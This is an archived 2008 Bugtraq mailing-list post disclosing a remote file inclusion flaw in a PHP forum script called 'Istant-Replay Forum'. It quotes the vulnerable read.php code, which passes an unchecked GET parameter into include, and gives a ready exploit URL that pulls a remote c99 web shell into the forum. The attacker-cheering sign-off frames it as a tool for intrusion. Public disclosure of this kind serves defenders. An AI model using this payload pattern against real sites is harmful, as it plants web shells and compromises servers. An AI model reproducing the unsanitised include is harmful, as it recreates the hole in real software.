| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080415191342.15262.qmail@securityfocus.com>
Date: 15 Apr 2008 19:13:42 -0000
From: win32.exe@...n
To: bugtraq@...urityfocus.com
Subject: remote file include
#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################
## AUTHOR: THuGM4N
## Email : Win32.exe@...n
## Script : Istant-Replay Forum
## Site : http://www.chattaitaliano.com
## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];
$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## BUT THE EXPLOIT IS LIKE THAT :
http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?
## BIGUP 2 All Attackers Around The World .
#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################